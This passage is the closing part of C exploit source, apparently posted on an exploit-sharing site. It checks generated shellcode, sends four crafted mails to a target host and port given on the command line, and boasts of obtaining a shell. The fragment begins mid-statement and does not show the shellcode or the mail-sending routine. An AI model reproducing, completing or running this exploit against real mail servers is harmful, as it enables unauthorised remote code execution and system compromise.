(!sh_Len) { printf("[-] Shellcode generate error.\n"); exit(1); } //printf("shellcode length is: %d \n",strlen((char *)sh_Buff)); //PrintSc(sh_Buff, sh_Len); Sleep(200); for (int mail_payload = 0; mail_payload <= 3; mail_payload++) { //printf("[+]Now Sending the %d fucking Mail!\n",mail_payload+1); sendfuckingmail(mail_payload, argv[1], atoi(argv[2])); Sleep(2000); } printf("Got a Shell on your port ?! @_@\n\n"); return 1; } # 0day.today [2024-12-24] #